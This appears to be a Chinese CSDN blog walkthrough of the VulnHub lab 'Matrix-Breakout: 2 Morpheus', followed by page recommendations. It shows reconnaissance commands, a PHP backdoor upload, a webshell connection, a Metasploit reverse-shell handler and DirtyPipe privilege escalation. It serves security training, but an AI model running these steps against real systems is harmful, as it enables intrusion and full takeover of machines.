vulhub靶场 MATRIX-BREAKOUT: 2 MORPHEUS

最新推荐文章于 2024-07-24 22:06:14 发布

为几何欢

最新推荐文章于 2024-07-24 22:06:14 发布

阅读量264

点赞数 5

文章标签：服务器 linux 网络网络安全安全系统安全 web安全

本文链接：https://blog.csdn.net/qq_55349490/article/details/139303420

版权

靶场搭建：

Matrix-Breakout: 2 Morpheus ~ VulnHub

1、信息收集：

nmap 192.168.0.0/24

2、Web漏洞利用

寻找利用点

使用gobuster进行扫描 gobuster dir -u http://192.168.0.11 -x php,bak,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
扫到这个文件
访问

发送一个 123 抓包看看
尝试访问这个文件
成功写入进去了

利用后门

将文件名改成php,发送后门代码
哥斯拉连接
反弹到msf

 use exploit/multi/handler
 set payload php/meterpreter/reverse_tcp
 set lhost 0.0.0.0
 set lport 4444
 run

成功反弹

3、内核提权

上传提权工具脚本

upload /home/kali/getpower/linux-exploit-suggester.sh /tmp/1.sh

执行脚本

shell
cd  /tmp
chmod +x 1.sh
./1.sh

重点关注有高亮的

我们知道了 cve-2022-0847有戏，然后到msf去查看是否有利用模块，没有再去网上找
search cve_2022_0847
msf存在现成的。

提权

use exploit/linux/local/cve_2022_0847_dirtypipe 
set session 1
set lhost 【你的kaliip】
run

成功提权

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

为几何欢

关注关注

5
点赞
踩
4

收藏

觉得还不错? 一键收藏
0
评论
vulhub靶场 MATRIX-BREAKOUT: 2 MORPHEUS

【代码】vulhub靶场 MATRIX-BREAKOUT: 2 MORPHEUS。
复制链接

扫一扫

DA14531MOD-Breakout：DA14531MOD-Breakout板

02-18

【DA14531MOD-Breakout：DA14531MOD-Breakout板】 DA14531MOD-Breakout是一款基于DA14531智能蓝牙低功耗（SmartBond TINY）微控制器的开发板，旨在为开发者提供一个便捷的平台，用于测试、原型设计和应用开发。这款...

【vulnhub靶场】MATRIX-BREAKOUT: 2 MORPHEUS

信安是不可或缺的一部分！

06-05

1288

这是《黑客帝国》系列的第二部，副标题是《沉睡魔咒:1》。它的主题是回到第一部《黑客帝国》。你扮演的角色是Trinity，试图调查尼布甲尼撒号上的一台电脑，Cypher把其他人都锁在了电脑之外，这台电脑拥有解开谜团的钥匙。使用apache漏洞利用：（失败）在目录爆破时已经注定失败。192.168.200.254为net网卡dhcp地址。192.168.200.2为net网卡网关。网段为：192.168.200.0/24。靶机地址：192.168.200.134。192.168.200.1为物理机地址。

参与评论您还未登录，请先登录后发表或查看评论

RxJS-Breakout:RxJS的游戏

05-02

RxJS-BreakoutA game into to RxJSLike this:Installnpm installRunnpm start打开浏览器输入http://localhost:8000

hoverboard-breakout:气垫板突破板

05-18

用于Bobbycar的气垫板突破板，具有PCB-Nunchuk连接器，线性稳压器，用于I2C的上拉和用于ADC输入的下拉 Nunchuk至Hoverboard连接器板，具有Nunchuk插座，线性稳压器和上拉电阻。该板仅适用于双节棍，因此更小，并带...

android-breakout:自动从code.google.compandroid-breakout导出

05-21

android-breakout 从code.google.com/p/android-breakout自动导出一个简单的桨/球/射击所有砖块游戏OpenGL / GLSurfaceView

snes-breakout:适用于SNES V0.1的简单Breakout克隆

04-28

$ cd snes-breakout $ make 完成的ROM应该在build/release子目录中。档案结构 gfx/ ：包含所有二进制图形数据以及用于创建图形的原始aseprite和Tiled文件 levels/ ：包含由LoadLevel子例程加载的所有级别数据。 ...

Linux：基础命令学习

qq_55038440的博客

07-20

959

实例：-F根据文件类型在列出的文件名称后加一符号。实例： -R 递归显示目录中的所有文件和子目录。. 开头的隐藏文件也会列出。可执行文件则加 "*"，用于显示目录文件信息。

【cmd】Windows CMD命令整理及示例使用

Young_Pro的博客

07-21

1077

上述这些命令涵盖了日常使用中的大部分场景，从文件操作、系统维护到网络管理的多个方面。每个命令都有其特定的用途，并且可以通过附加参数来执行更复杂的任务。显示活动的TCP连接、侦听的端口、以太网统计信息、IP路由表和IP统计信息。显示所有适配器的IP地址、子网掩码和默认网关（续）。此命令可用于创建虚拟驱动器。显示所有适配器的IP地址、子网掩码和默认网关。显示包括服务在内的所有当前运行的任务（续）。显示包括服务在内的所有当前运行的任务。显示本地或远程计算机的系统信息（续）。显示或设置可执行文件的搜索路径（续）。

ROS参数服务器增删改查实操Python

最新发布

m0_49289284的博客

07-24

684

用Python实现了ROS参数服务器的增删改查

VMware三种网络模式---巨细

zhoutong2323的博客

07-23

805

本文主要介绍VMware的三种网络模式桥接模式：默认与宿主机VMnet0绑定NAT模式：默认与宿主机VMnet8绑定仅主机模式：默认与宿主机VMnet1绑定。

如何同时配置两台VPS服务器？

a17759353293的博客

07-24

533

我们都知道将各种服务器功能拆分到多个VPS上比所有功能合并到单个大型服务器上更有优势，接下来，我们将通过研究如何配置两台服务器（一台用作数据库，另一台用作网站的 Web 服务器）来了解此方法的实际应用。

客户端与服务器通讯详解（4）：支持实时通讯的协议

贝格前端工场的博客

07-23

516

在之前的章节中，贝格前端工场给大家分享了客户端与服务器通讯详解定义、流程、协议、方式。

服务器IP和电脑IP有什么不同

hgdlip的博客

07-17

641

服务器IP和电脑ip有什么不同？在当今的信息化时代，IP地址作为网络世界中不可或缺的元素，扮演着举足轻重的角色。然而，对于非专业人士来说，服务器IP和电脑IP之间的区别往往模糊不清。本文旨在深入探讨这两者之间的不同，帮助读者更好地理解和应用它们。

力扣1882.使用服务器处理任务

Pisasama的博客

07-21

197

【代码】力扣1882.使用服务器处理任务。

服务器压力测试

weixin_60830013的博客

07-24

以下是一些关键步骤和考虑因素：1. 定义目标:• 明确测试的目标是什么，例如，确定最大并发用户数，响应时间阈值，吞吐量等。• 收集基准数据:• 在开始测试前，记录服务器的正常运行状态，包括CPU使用率，内存占用，磁盘I/O，网络流量等。• 选择测试工具:• 使用适当的负载测试工具，如JMeter，LoadRunner，Gatling，Apache Bench等。• 包括不同的用户数量，请求类型（GET，POST），数据大小，以及可能的并发操作。• 记录关键指标，如响应时间，吞吐量，失败率等。

如何在vscode中对在服务器上多卡运行的bash脚本进行debug?

a61022706的博客

07-24

132

使用vscode可以很方便地添加断点，进行代码调试。在使用服务器时，我们的python代码通常是通过bash脚本来执行的，那么如何进行debug呢？

如果提升服务器安全性，使用快卫士给服务器上“锁”

qq_38647109的博客

07-24

248

服务器作为数据存储与业务处理的核心，其安全性直接关系到企业的运营稳定和信息安全。面对日益复杂的网络攻击手段，如何有效提升服务器的安全防护能力，成为了每个企业和个人用户必须面对的重要课题。在众多服务器安全解决方案中，快卫士以其卓越的性能和全面的防护功能脱颖而出，成为提升服务器安全性的理想选择。

使用多进程和多线程实现服务器并发【C语言实现】

qq_42037383的博客

07-20

1118

如果需要和发起新的连接请求的客户端建立连接，那么就必须在服务器端通过一个循环调accept()函数，另外已经和服务器建立连接的客户端需要和服务器通信，发送数据时的阻塞可以忽略，当接收不到数据时程序也会被阻塞，这时候就会非常矛盾，被accept()阻塞就无法通信，被read()阻塞就无法和客户端建立新连接。

ubuntu配置ssh服务器详解

qq_40397392的博客

07-23

546

一般最开始都没有ssh服务。

vulnhub靶场 breakout

08-29

chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] ...